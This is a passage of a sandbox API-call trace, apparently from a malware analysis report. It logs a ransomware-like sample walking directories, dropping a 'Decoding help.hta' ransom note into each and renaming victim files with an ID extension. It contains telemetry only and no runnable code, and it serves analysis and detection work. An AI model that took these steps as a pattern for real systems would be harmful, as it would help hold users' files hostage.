cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 0 [0060.109] FindClose (in: hFindFile=0x5a5b70 | out: hFindFile=0x5a5b70) returned 1 Thread: id = 954 os_tid = 0xc34 [0060.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*.*", lpFindFileData=0x16d9fd30 | out: lpFindFileData=0x16d9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a54b0 [0060.108] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.108] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x16d9fd30 | out: lpFindFileData=0x16d9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.108] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.108] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.108] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x16d9fd30 | out: lpFindFileData=0x16d9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ab54b00, ftCreationTime.dwHighDateTime=0x1d1a02d, ftLastAccessTime.dwLowDateTime=0x9ab54b00, ftLastAccessTime.dwHighDateTime=0x1d1a02d, ftLastWriteTime.dwLowDateTime=0x9ab54b00, ftLastWriteTime.dwHighDateTime=0x1d1a02d, nFileSizeHigh=0x0, nFileSizeLow=0xfc93c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows6.1-KB2999226-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0060.108] lstrcpyW (in: lpString1=0x2523fd00, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*.*" [0060.108] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*.*") returned 100 [0060.108] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Decoding help.hta" [0060.108] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\decoding help.hta")) returned 0xffffffff [0060.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0061.450] WriteFile (in: hFile=0x348, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x16d9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x16d9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.451] CloseHandle (hObject=0x348) returned 1 [0062.533] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 955 os_tid = 0xc38 [0060.113] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\*.*", lpFindFileData=0x1329fd30 | out: lpFindFileData=0x1329fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 956 os_tid = 0xc40 [0060.117] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\*.*", lpFindFileData=0x16e9fd30 | out: lpFindFileData=0x16e9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da4b8 [0060.117] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.117] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x16e9fd30 | out: lpFindFileData=0x16e9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.117] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.117] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.117] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x16e9fd30 | out: lpFindFileData=0x16e9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0060.118] FindClose (in: hFindFile=0x5da4b8 | out: hFindFile=0x5da4b8) returned 1 Thread: id = 957 os_tid = 0x8dc [0060.122] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\*.*", lpFindFileData=0x16f9fd30 | out: lpFindFileData=0x16f9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da4b8 [0060.122] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.122] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x16f9fd30 | out: lpFindFileData=0x16f9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.122] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.122] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.122] FindNextFileW (in: hFindFile=0x5da4b8, lpFindFileData=0x16f9fd30 | out: lpFindFileData=0x16f9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0060.122] FindClose (in: hFindFile=0x5da4b8 | out: hFindFile=0x5da4b8) returned 1 Thread: id = 958 os_tid = 0xc70 [0060.135] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\*.*", lpFindFileData=0x70efd30 | out: lpFindFileData=0x70efd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22b43298, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da338 [0060.135] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.135] FindNextFileW (in: hFindFile=0x5da338, lpFindFileData=0x70efd30 | out: lpFindFileData=0x70efd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22b43298, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.135] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.135] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.135] FindNextFileW (in: hFindFile=0x5da338, lpFindFileData=0x70efd30 | out: lpFindFileData=0x70efd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="localizedSettings.css", cAlternateFileName="")) returned 1 [0060.135] lstrcpyW (in: lpString1=0x25390260, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\*.*" [0060.135] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\*.*") returned 79 [0060.135] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\Decoding help.hta" [0060.135] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\decoding help.hta")) returned 0xffffffff [0060.135] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0061.452] WriteFile (in: hFile=0x348, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x70efcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x70efcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.452] CloseHandle (hObject=0x348) returned 1 [0061.453] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.453] lstrcmpiW (lpString1="Decoding help.hta", lpString2="localizedSettings.css") returned -1 [0061.453] lstrlenW (lpString="localizedSettings.css") returned 21 [0061.453] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\*.*" [0061.453] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\*.*") returned 79 [0061.453] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\", lpString2="localizedSettings.css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\localizedSettings.css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\localizedSettings.css" [0061.453] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\localizedSettings.css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\localizedSettings.css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\localizedSettings.css" [0061.453] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\localizedSettings.css", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\localizedSettings.css.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\localizedSettings.css.[ID]g9uZrLhJaygpwRm1[ID]" [0061.453] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\localizedSettings.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\localizedsettings.css"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\css\\localizedSettings.css.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\css\\localizedsettings.css.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0062.516] FindNextFileW (in: hFindFile=0x5da338, lpFindFileData=0x70efd30 | out: lpFindFileData=0x70efd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2786, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.css", cAlternateFileName="")) returned 1 Thread: id = 959 os_tid = 0x8e0 [0060.136] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*.*", lpFindFileData=0x1761fd30 | out: lpFindFileData=0x1761fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671cb0 [0060.138] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.138] FindNextFileW (in: hFindFile=0x671cb0, lpFindFileData=0x1761fd30 | out: lpFindFileData=0x1761fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.138] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.138] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.138] FindNextFileW (in: hFindFile=0x671cb0, lpFindFileData=0x1761fd30 | out: lpFindFileData=0x1761fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a37a2c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", cAlternateFileName="CLICEX~1.000")) returned 1 [0060.138] lstrcmpW (lpString1=".", lpString2="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715") returned -1 [0060.138] lstrcmpW (lpString1="..", lpString2="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715") returned -1 [0060.138] lstrcmpiW (lpString1="windows", lpString2="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715") returned 1 [0060.138] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*.*" [0060.139] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*.*") returned 86 [0060.139] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\", lpString2="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715" [0060.139] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\*.*" [0060.139] GlobalMemoryStatus (in: lpBuffer=0x1761fd10 | out: lpBuffer=0x1761fd10) [0060.825] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a9f8d50, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa30 [0064.500] CloseHandle (hObject=0xa30) returned 1 [0064.500] FindNextFileW (in: hFindFile=0x671cb0, lpFindFileData=0x1761fd30 | out: lpFindFileData=0x1761fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", cAlternateFileName="GOOGAP~1.000")) returned 1 [0064.500] lstrcmpW (lpString1=".", lpString2="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec") returned -1 [0064.500] lstrcmpW (lpString1="..", lpString2="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec") returned -1 [0064.500] lstrcmpiW (lpString1="windows", lpString2="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec") returned 1 Thread: id = 960 os_tid = 0xc48 [0060.137] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*.*", lpFindFileData=0x180dfd30 | out: lpFindFileData=0x180dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671430 [0060.137] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.137] FindNextFileW (in: hFindFile=0x671430, lpFindFileData=0x180dfd30 | out: lpFindFileData=0x180dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65fb9720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65fb9720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.138] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.138] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.138] FindNextFileW (in: hFindFile=0x671430, lpFindFileData=0x180dfd30 | out: lpFindFileData=0x180dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65fb9720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a3a0420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3a0420, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6NG60CXZ.9GJ", cAlternateFileName="")) returned 1 [0060.138] lstrcmpW (lpString1=".", lpString2="6NG60CXZ.9GJ") returned -1 [0060.138] lstrcmpW (lpString1="..", lpString2="6NG60CXZ.9GJ") returned -1 [0060.138] lstrcmpiW (lpString1="windows", lpString2="6NG60CXZ.9GJ") returned 1 [0060.138] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*.*" [0060.138] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*.*") returned 78 [0060.138] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\", lpString2="6NG60CXZ.9GJ" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ" [0060.138] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\*.*") 